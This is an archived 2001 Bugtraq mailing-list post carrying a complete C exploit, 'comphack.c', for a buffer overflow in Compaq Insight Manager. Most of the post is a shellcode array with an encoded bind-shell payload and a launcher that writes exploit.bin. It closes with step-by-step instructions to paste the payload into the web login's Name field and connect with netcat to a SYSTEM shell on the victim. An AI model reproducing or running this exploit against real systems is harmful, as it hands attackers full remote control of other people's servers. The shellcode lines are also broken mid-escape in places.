comphack - Compaq Insight Manager Remote SYSTEM shell
From: Indigo (indig0@talk21.com)Date: 11/29/01
- Previous message: Jonathan G. Lampe: "RE: File extensions spoofable in MSIE download dialog"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 29 Nov 2001 11:54:47 -0000 Message-ID: <20011129115447.30876.qmail@mail.securityfocus.com> From: Indigo <indig0@talk21.com> To: bugtraq@securityfocus.com Subject: comphack - Compaq Insight Manager Remote SYSTEM shell('binary' encoding is not supported, stored as-is) Mailer: SecurityFocus
I'm running out of Win32 vulnerabilities to exploit
here...Anyone got any ideas?
Cheers,
Indigo.
/* comphack.c - Compaq Insight Manager
overflow exploit by Indigo <indig0@talk21.com> 2001
Usage: comphack <victim port>
This code has been compiled and tested
on Linux and Win32
The shellcode spawns a SYSTEM shell on
the chosen port
Main shellcode adapted from code written
by izan@deepzone.org
Greets to:
Morphsta, Br00t, Macavity, Jacob &
Monkfish...Not forgetting D-Niderlunds
*/
/* #include <windows.h> uncomment if compiling on
Win32 */
#include <stdio.h>
int main(int argc, char **argv)
{
unsigned char shellcode[] =
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x2B\x16\xEA\x77
\xFF\xE1\x03\x10"
"\xEA\x2F\x05\x10\x90\x90\x90\x90\x31\xFF\x01\xE7
\x31\xC9\xB1\x6F"
"\x01\xCF\xB1\x4C\x01\xCF\x31\xC0\xB0\x20\x29\x07
\x31\xDB\xB3\x18"
"\x01\xDF\x29\x07\xB3\x20\x01\xDF\x29\x07\xB3
\x1D\x01\xDF\x29\x07"
"\xB3\x19\x01\xDF\x29\x07\xB3\x55\x01\xDF\x29\x07
\xB3\x05\x01\xDF"
"\xB3\x05\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07
\xB3\x12\x01\xDF"
"\x29\x07\xB3\x17\x01\xDF\x29\x07\xB3\x07\x01
\xDF\x29\x07\xB3\x14"
"\x01\xDF\x29\x07\xB3\x28\x01\xDF\x29\x07\xB3
\x3F\x01\xDF\x29\x07"
"\xB3\x7C\x01\xDF\x29\x07\xB3\xCE\x01\xDF\x29\x07
\xB3\x08\x01\xDF"
"\x29\x07\xB3\x3B\x01\xDF\x29\x07\xB3\x4B\x01
\xDF\x29\x07\x66\x81"
"\xEF\xA3\x03\x31\xDB\xB8\x5F\x5F\x5F\x5F\x31\x07
\x47\x47\x47\x47"
"\x43\x43\x43\x43\x66\x81\xFB\xFC\x04\x7E\xEF\xB7
\x5F\x5F\x5F\x5F"
"\x02\xDE\xB2\xA6\x7E\x1F\x5F\xD2
\xEA\xAD\x7B\x1F\x5F\xD2\xE2\xA5"
"\x7B\x1F\x5F\x35\x58\xCF\xCF\xCF\xCF\x06\xB7
\xAD\x5D\x5F\x5F\xD2"
"\xEA\x75\x7A\x1F\x5F\xD2\xE2\x6C\x7A\x1F\x5F\x35
\x55\xCF\xCF\xCF"
"\xCF\x06\xB7\xE5\x5D\x5F\x5F\x35\x5F\xD2\xEA\xA6
\x7A\x1F\x5F\x09"
"\xD2\xEA\xBA\x7A\x1F\x5F\x09\xD2\xEA\xB6
\x7A\x1F\x5F\x09\xA0\xCA"
"\x6C\x7A\x1F\x5F\x35\x5F\xD2\xEA\xA6
\x7A\x1F\x5F\x09\xD2\xEA\xB2"
"\x7A\x1F\x5F\x09\xD2\xEA\xAE\x7A\x1F\x5F\x09\xA0
\xCA\x6C\x7A\x1F"
"\x5F\xB8\xDA\xAA\x7A\x1F\x5F\x1B\x5F\x5F\x5F\xD2
\xEA\xAA\x7A\x1F"
"\x5F\x09\xA0\xCA\x68\x7A\x1F\x5F\xD2\xEA\x72\x79
\x1F\x5F\xF2\x0F"
"\xA0\xCA\x0C\x7A\x1F\x5F\xD2\xEA\x6E\x79
\x1F\x5F\xF2\x0F\xA0\xCA"
"\x0C\x7A\x1F\x5F\xD2\xEA\xAE\x7A\x1F\x5F\xD2
\xE2\x72\x79\x1F\x5F"
"\xFA\xD2\xEA\xBA\x7A\x1F\x5F\xF2\xD2\xE2
\x6E\x79\x1F\x5F\xF4\xD2"
"\xE2\x6A\x79\x1F\x5F\xF4\xB8\xDA\x7A\x79
\x1F\x5F\x5F\x5F\x5F\x5F"
"\xB8\xDA\x7E\x79\x1F\x5F\x5E\x5E\x5F\x5F\xD2
\xEA\x66\x79\x1F\x5F"
"\x09\xD2\xEA\xAA\x7A\x1F\x5F\x09\x35\x5F\x35
\x5F\x35\x4F\x35\x5E"
"\x35\x5F\x35\x5F\xD2\xEA\x16\x79\x1F\x5F\x09\x35
\x5F\xA0\xCA\x64"
"\x7A\x1F\x5F\x37\x5F\x7F\x5F\x5F\xCF\x37
\x5F\x5D\x5F\x5F\xA0\xCA"
"\x1C\x7A\x1F\x5F\xD6\xDA\x0E\x79
\x1F\x5F\x6C\xBF\x0F\x1F\x0F\x1F"
"\x0F\xA0\xCA\xA5\x7B\x1F\x5F\x0F\x04\x35\x4F\xD2
\xEA\xB6\x7A\x1F"
"\x5F\x09\x0C\xA0\xCA\xA1\x7B\x1F\x5F\x35
\x5C\x0C\xA0\xCA\x5D\x7A"
"\x1F\x5F\xD2\xEA\x2A\x79\x1F\x5F\x09\xD2\xEA\xB6
\x7A\x1F\x5F\x09"
"\x0C\xA0\xCA\x59\x7A\x1F\x5F\xD2\xE2\x06\x79
\x1F\x5F\xF4\x6C\xBF"
"\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\x0F\x0F\xD2
\xEA\xB6\x7A\x1F"
"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0
\xCA\x10\x7A\x1F"
"\x5F\xB4\x12\xCF\xCF\xCF\x6C\xBF\x0F\xD2\xE2
\x3A\x79\x1F\x5F\x08"
"\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0
\xCA\x60\x7A\x1F"
"\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xDC\xE2
\x3A\x79\x1F\x5F\x5D"
"\x50\xDD\x48\x5E\x5F\x5F\xDE\xE2\x3A\x79
\x1F\x5F\x5E\x7F\x5F\x5F"
"\x2D\x51\xCF\xCF\xCF\xCF\xB8\xDA\x3A\x79
\x1F\x5F\x5F\x7F\x5F\x5F"
"\x35\x5F\xD4\xDA\x3A\x79\x1F\x5F\xD2\xE2\x3A\x79
\x1F\x5F\x08\x0F"
"\xD4\xDA\x0E\x79\x1F\x5F\x0F\xD2\xEA\xB6
\x7A\x1F\x5F\xF2\x0F\xA0"
"\xCA\x18\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10
\x7A\x1F\x5F\xD4\xDA\x3A"
"\x79\x1F\x5F\x35\x5F\x0F\xD2\xEA\x0E\x79
\x1F\x5F\xF2\x0F\xD2\xEA"
"\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x55
\x7A\x1F\x5F\x35\x5F\xD2\xE2"
"\x3A\x79\x1F\x5F\x08\x35\x5F\x35\x5F\x35\x5F\xD2
\xEA\xB6\x7A\x1F"
"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0
\xCA\x10\x7A\x1F"
"\x5F\x6C\xB6\x66\xD2\x3A\x79\x1F\x5F\x50\xD8\x38
\xA0\xA0\xA0\x35"
"\x5F\x37\x5F\x7F\x5F\x5F\xCF\xD2\xEA\x0E\x79
\x1F\x5F\xF2\x0F\xD2"
"\xEA\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x51
\x7A\x1F\x5F\xD6\xDA\x3E"
"\x79\x1F\x5F\x35\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08
\x0F\xD2\xEA\x0E"
"\x79\x1F\x5F\xF2\x0F\xD2\xEA\xB2\x7A\x1F\x5F\xF2
\x0F\xA0\xCA\x14"
"\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\x35
\x5F\xD4\xDA\x3E"
"\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD4
\xDA\x0E\x79\x1F"
"\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0
\xCA\x18\x7A\x1F\x5F"
"\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xB6\xE6\xA1\xA0
\xA0\xD2\xEA\x06"
"\x79\x1F\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\xD2
\xEA\x02\x79\x1F"
"\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\x35\x5F\xA0
\xCA\x08\x7A\x1F"
"\x5F\x0E\x09\x37\x0F\x6D\x5A\x4F\xCF\x05\xA0
\x4D\x0F\x04\x06\x08"
"\x01\x0E\x09\x0C\x37\x07\x6D\x5A\x4F\xCF\x05\xA0
\x4D\x0F\xF3\xDB"
"\xBF\x2A\xA4\x07\xF4\x06\xBD\xB6\xBC\x08\x0C\x10
\x1C\x14\x6C\x6D"
"\x5F\x2C\x30\x3C\x34\x3A\x2B\x5F\x3D\x36\x31
\x3B\x5F\x33\x36\x2C"
"\x2B\x3A\x31
\x5F\x3E\x3C\x3C\x3A\x2F\x2B\x5F\x2C\x3A\x31
\x3B\x5F"
"\x2D\x3A\x3C\x29\x5F\x3C\x33\x30\x2C\x3A\x2C\x30
\x3C\x34\x3A\x2B"
"\x5F\x14\x1A\x2D\x11\x1A\x13
\x6C\x6D\x5F\x1C\x2D\x3A\x3E\x2B\x3A"
"\x0F\x36\x2F\x3A\x5F\x18
\x3A\x2B\x0C\x2B\x3E\x2D\x2B\x2A\x2F\x16"
"\x31\x39\x30
\x1E\x5F\x1C\x2D\x3A\x3E\x2B\x3A\x0F\x2D\x30
\x3C\x3A"
"\x2C\x2C\x1E\x5F\x0F\x3A\x3A\x34\x11\x3E\x32
\x3A\x3B\x0F\x36\x2F"
"\x3A\x5F\x18\x33\x30\x3D\x3E\x33\x1E\x33\x33\x30
\x3C\x5F\x2D\x3A"
"\x3E\x3B\x19\x36\x33\x3A\x5F\x08\x2D\x36
\x2B\x3A\x19\x36\x33\x3A"
"\x5F\x0C\x33\x3A\x3A\x2F\x5F\x1C\x33\x30
\x2C\x3A\x17\x3E\x31\x3B"
"\x33\x3A\x5F\x1A\x27\x36\x2B\x0F\x2D\x30
\x3C\x3A\x2C\x2C\x5F\x1C"
"\x30\x3B\x3A\x3B\x7F\x3D\x26\x7F\x23\x05\x3E\x31
\x7F\x63\x36\x25"
"\x3E\x31\x1F\x3B\x3A\x3A\x2F\x25\x30\x31\x3A\x71
\x30\x2D\x38\x61"
"\x5D\x5F\x40\x17
\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
"\x53
\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5E\x5F\x5F\x5F\x5F\x
5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x1C\x12\x1B\x71\x1A\x07
\x1A\x5F\x5F\x5F\x5F\x5F\x4F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x56\x56\x56\x56\x56\x00";
FILE *fp;
unsigned short int a_port;
printf ("\nCompaq Insight Manager overflow
launcher\nby Indigo <indig0@talk21.com> 2001\n\n");
printf ("This program will generate a binary file called
exploit.bin\n");
printf ("Connect to the victim using a web browser
http://victim:2301\n");
printf ("Next to \'Login Account\', click on
\'anonymous\'\n");
printf ("Enter some random characters into the
\'password\' field\n");
printf ("Open exploit.bin in notepad, highlight it then
copy to the clipboard\n");
printf ("Paste the exploit into the \'Name\' field and
click OK\n");
printf ("\nLaunch netcat: nc <victim host> <victim
port>\n");
printf ("\nThe exploit spawns a SYSTEM shell on the
chosen port\n\n");
if (argc != 2)
{
printf ("Usage: %s <victim port>\n", argv[0]);
exit (0);
}
a_port = htons(atoi(argv[1]));
a_port^= 0x5f5f;
shellcode[1650]= (a_port) & 0xff;
shellcode[1651]= (a_port >> 8) & 0xff;
fp = fopen ("./exploit.bin","wb");
fputs (shellcode,fp);
fclose (fp);
return 0;
}
- Previous message: Jonathan G. Lampe: "RE: File extensions spoofable in MSIE download dialog"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
